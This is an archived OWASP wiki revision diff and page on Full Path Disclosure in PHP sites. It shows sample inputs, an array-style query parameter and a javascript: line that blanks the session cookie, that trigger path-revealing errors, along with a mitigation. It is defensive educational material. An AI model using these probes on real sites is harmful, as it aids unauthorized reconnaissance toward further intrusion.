This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Full Path Disclosure"

From OWASP
Jump to: navigation, search
Line 8: Line 8:
  
 
==Description==
 
==Description==
 
 
Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file.  e.g.: /home/omg/htdocs/file/.  
 
Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file.  e.g.: /home/omg/htdocs/file/.  
 
Certain vulnerabilities, such as using the load_file() (within a [[SQL Injection]]) query to view the page source, require the attacker to have the full path to the file they wish to view.
 
Certain vulnerabilities, such as using the load_file() (within a [[SQL Injection]]) query to view the page source, require the attacker to have the full path to the file they wish to view.
Line 14: Line 13:
 
==Risk Factors==
 
==Risk Factors==
 
TBD
 
TBD
[[Category:FIXME|comment]]
 
  
 
==Examples==
 
==Examples==
Line 36: Line 34:
 
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters,  
 
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters,  
 
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre>
 
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre>
 +
 +
This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.
 +
<pre>error_reporting(0);</pre>
  
 
==Related [[Threat Agents]]==
 
==Related [[Threat Agents]]==
Line 55: Line 56:
 
* [[Address space layout randomization (ASLR)]]
 
* [[Address space layout randomization (ASLR)]]
 
* [[Stack-smashing Protection (SSP)]]
 
* [[Stack-smashing Protection (SSP)]]
[[Category:FIXME|this was the text that was here before we added the links. Can it be deleted?
+
 
* This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.
 
<pre>error_reporting(0);</pre>]]
 
  
 
==References==
 
==References==

Revision as of 12:42, 16 February 2009

This is an Attack. To view all attacks, please see the Attack Category page.


Last revision: 02/16/2009


ASDR Table of Contents

Description

Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view.

Risk Factors

TBD

Examples

Empty Array

If we have a site that uses a method of requesting a page like this:

http://site.com/index.php?page=about

We can use a method of opening and closing braces that causes the page to output an error. This method would look like this:

http://site.com/index.php?page[]=about

This renders the page defunct thus spitting out an error:

Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131

Null Session Cookie

Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections. A simple injection using this method would look something like so:

javascript:void(document.cookie="PHPSESSID=");

By simply setting the PHPSESSID cookie to nothing (null) we get an error.

Warning: session_start() [function.session-start]: The session id contains illegal characters, 
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2

This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.

error_reporting(0);

Related Threat Agents

Related Attacks

Related Vulnerabilities

  • None

Related Controls


References